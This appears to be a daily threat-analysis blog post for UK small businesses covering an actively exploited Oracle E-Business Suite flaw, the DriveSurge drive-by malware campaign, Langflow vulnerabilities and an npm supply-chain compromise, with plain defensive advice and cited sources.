Threat Analysis: Oracle EBS Under Active Exploitation and the DriveSurge Drive-By Campaign, What UK SMBs Need to Know

Threats & Attacks

Threat Analysis: Oracle EBS Under Active Exploitation and the DriveSurge Drive-By Campaign, What UK SMBs Need to Know

By Mauven MacLeod ·

Hello, Mauven here.

This is your Daily Threat Analysis for 29th June 2026.

Two stories today. One is a known vulnerability class being actively exploited against software that sits at the heart of business operations. The other is a quieter threat, the kind that does not generate headlines until the breach notifications start going out. Both have direct implications for UK SMBs, including organisations that do not run the affected software themselves.

Oracle E-Business Suite: CVE-2026-46817 Is Being Exploited Right Now

Let us start with the most pressing item. Threat intelligence company Defused has confirmed that CVE-2026-46817, a critical vulnerability in Oracle E-Business Suite, is under active exploitation in the wild. At time of writing, this has not appeared on CISA’s Known Exploited Vulnerabilities catalogue, but the confirmation of in-the-wild exploitation is sufficient reason to treat it as a priority.

Oracle E-Business Suite is enterprise financial and HR management software. It handles procurement, payroll, accounts payable, and supply chain functions for large organisations. The immediate audience for this advisory is, on the face of it, large enterprises. Not your concern if you are running a twenty-person professional services firm.

Except it is, and here is why.

Also confirmed today: Nissan has disclosed that attackers breached its Oracle PeopleSoft instance, a related Oracle enterprise platform, and may have exfiltrated payroll records and social security numbers. Nissan is pointing to an “unknown flaw” as the root cause, which at this stage is less informative than it sounds. What it tells you is that Oracle’s enterprise product portfolio is under active, sustained attention from threat actors right now. These are not isolated events.

The relevance to UK SMBs is supply chain exposure. If your payroll is outsourced to a bureau that runs Oracle EBS, if your primary customer is a manufacturer using Oracle for procurement, if your accountancy firm manages clients on Oracle, you are downstream of this risk. You do not have to run the vulnerable software yourself to be affected by a breach of someone who does.

The NCSC has published guidance on supply chain cyber security. The fact that most organisations still cannot name the software platforms their critical suppliers run on tells you everything about how seriously that guidance is being applied.

What to do if you use Oracle EBS directly: Oracle released its Critical Patch Update (CPU) for June 2026. Verify your patch status against that CPU immediately. If you are on a managed Oracle environment, get written confirmation from your provider that the patch has been applied.

What to do if you are downstream: Ask your payroll bureau, financial software provider, and any tier-one supplier whether they run Oracle EBS or PeopleSoft, and request confirmation of their patch status. You will not always get a straight answer. The fact that you asked creates a paper trail that matters if something goes wrong later.

DriveSurge: The Initial Access Broker You Have Not Heard Of Yet

The second story requires more context, because the mechanics of it are not immediately obvious.

Silent Push has published research identifying DriveSurge, a newly documented threat actor operating as an Initial Access Broker on a Pay-Per-Install model. In plain terms: DriveSurge compromises legitimate websites, injects malicious code, and then sells the resulting access to victim machines to other criminal operators, ransomware groups, credential thieves, whoever is buying.

The infection chain works like this. An employee visits a legitimate website, one they may have visited dozens of times. The injected code silently passes them through a Traffic Distribution System (zTDS) which profiles the visitor and redirects them to one of two delivery mechanisms: FakeUpdates, which presents a convincing browser update prompt, or ClickFix, which presents a fake CAPTCHA or error page with instructions that trick the user into running a malicious script.

Neither technique requires the user to open an email attachment. Neither requires them to click on an obviously suspicious link. The user visits a normal-looking website, sees what appears to be a routine browser prompt, and follows it. The malware executes.

The scale matters here. Silent Push reports thousands of compromised websites in this campaign. The operator is not targeting specific organisations, it is casting a wide net and selling whatever lands.

For UK SMBs, the implications are direct. Your staff browse the web. Some of those sites are already compromised. Standard perimeter controls, email filtering, SPF/DKIM, attachment scanning, do not address this vector at all.

What to check: Whether your web filtering solution blocks known zTDS redirect infrastructure. If you do not have a web filtering solution, this is a conversation to have with your IT provider today, not next quarter.

What to tell your staff: Browser update prompts that appear in the middle of browsing a website are not legitimate. Legitimate browser updates come through the browser’s own update mechanism, not through a webpage. Any prompt asking them to run a script, press keyboard shortcuts, or download an executable should be reported immediately rather than followed.

This is not complex awareness training. It is one sentence. The challenge is getting that sentence in front of every person in your organisation before DriveSurge gets there first.

On the Sidelines: AI Tooling and Supply Chain Risk

Two items in today’s intelligence feed are worth flagging without extended analysis, because they speak to a broader pattern.

First, CVE-2026-55255 in Langflow, an open-source framework for building AI agents and data pipelines, saw its first confirmed active exploitation on 25th June. Sysdig’s research makes an important point: the RCE vulnerability (CVE-2026-33017, CVSS 9.3) has been more widely exploited than the higher-scored CVSS 9.9 IDOR flaw, because the RCE requires no authentication. CVSS scores are not a reliable proxy for exploitation likelihood. If your organisation is experimenting with AI tooling built on open-source frameworks, the security posture of that tooling deserves the same scrutiny as any other production system.

Second, the Miasma Mini Shai-Hulud supply chain campaign has compromised npm packages under the @immobiliarelabs scope, specifically targeting Backstage plugins used for GitLab integration and LDAP authentication. If your development team uses Backstage or any CI/CD tooling that pulls from npm, check your dependency trees against the affected package versions. Socket.dev has published the full indicator list.

Summary: Actions for Today

  • Oracle EBS users: Verify patch status against Oracle’s June 2026 CPU. Get written confirmation from managed service providers.
  • Everyone else: Ask critical suppliers, payroll, finance, logistics, whether they run Oracle EBS or PeopleSoft, and request patch confirmation in writing.
  • Web browsing hygiene: Brief staff that browser update prompts appearing mid-session on websites are a red flag and should be reported, not followed.
  • Web filtering: Confirm with your IT provider that your web filtering blocks zTDS redirect infrastructure.
  • AI and dev tooling: If you are running Langflow or Backstage-based pipelines, check your patch status and npm dependency trees today.

None of this requires a large security budget. It requires someone to make the calls and send the emails. If that person is you, do it today.

If Threat Analysis is useful to you, follow the show wherever you listen so tomorrow’s briefing lands automatically, and if someone in your network needs this, send it to them now. One forward today might be the heads-up that actually matters.

Sources

SourceTitleURL
BleepingComputerHackers now exploit critical Oracle E-Business flaw in attackshttps://www.bleepingcomputer.com/news/security/new-oracle-e-business-suite-flaw-now-exploited-in-attacks/
The RegisterNissan says Oracle PeopleSoft break-in may have spilled payroll records, SSNshttps://www.theregister.com/security/2026/06/29/nissan-says-oracle-peoplesoft-break-in-may-have-spilled-payroll-records-ssns/5263534
Silent PushA New Threat Actor Using ClickFix and Fake Update Drive-By Attacks in Thousands of Compromised Siteshttps://www.silentpush.com/blog/drivesurge/
SysdigUnderstanding Langflow CVE-2026-55255, and why higher CVSS vulnerabilities aren’t always the most exploitedhttps://www.sysdig.com/blog/understanding-langflow-cve-2026-55255-and-why-higher-cvss-vulnerabilities-arent-always-the-most-exploited
Socket.devMiasma Mini Shai-Hulud Hits ImmobiliareLabs npm Packageshttps://socket.dev/blog/miasma-mini-shai-hulud-hits-immobiliarelabs-npm-packages

Filed under

  • smb-security
  • uk-business
  • vendor-risk
  • supply-chain-risk
  • credential-theft
  • business-risk
  • incident-response